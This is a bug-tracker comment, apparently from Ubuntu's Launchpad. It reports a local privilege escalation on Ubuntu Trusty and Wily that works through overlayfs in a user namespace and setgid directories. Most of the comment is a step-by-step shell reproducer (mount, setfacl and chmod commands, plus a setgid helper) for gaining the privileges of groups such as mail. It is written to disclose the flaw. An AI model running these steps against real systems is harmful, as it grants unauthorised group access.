Comment 0 for bug 1534961

On Ubuntu Trusty but also Ubuntu Wily, following sequence allows to gain group privileges of arbitrary groups that created directories with properties to be found using "find / -perm -02020", e.g.

/usr/local/lib/python3.4 root.staff
/var/lib/libuuid libuuid.libuuid
/var/local root.staff
/var/mail root.mail

For Ubuntu Trusty, following sequence can be used to reproduce the problem:

* In user/mount namespace:

rm -rf Mnt Test
mkdir Mnt Test
mount -t overlayfs -o lowerdir=/var,upperdir=Test overlayfs Mnt

* Outside namespace

setfacl -m d:u:[your unpriv uid]:rwx Test

* Inside:

chmod 02777 Mnt/mail
umount Mnt

* Outside:

~/CreateSetgidBinary Test/mail/escalate /bin/mount x nonexistent-arg
Test/mail/escalate ~/ReportUidGidCwd

For Ubuntu Wily:

* Inside:

mkdir Mnt Test Work
mount -t overlayfs -o lowerdir=/var,upperdir=Test,workdir=Work overlayfs Mnt

* Outside:

setfacl -m d:u::rwx,d:u:[your unpriv uid]:rwx Work/work

* Inside:

chmod 02777 Mnt/mail
umount Mnt

* Outside:

~/CreateSetgidBinary Test/mail/escalate /bin/mount x nonexistent-arg
Test/mail/escalate ~/ReportUidGidCwd

CreateSetgidBinary is from http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/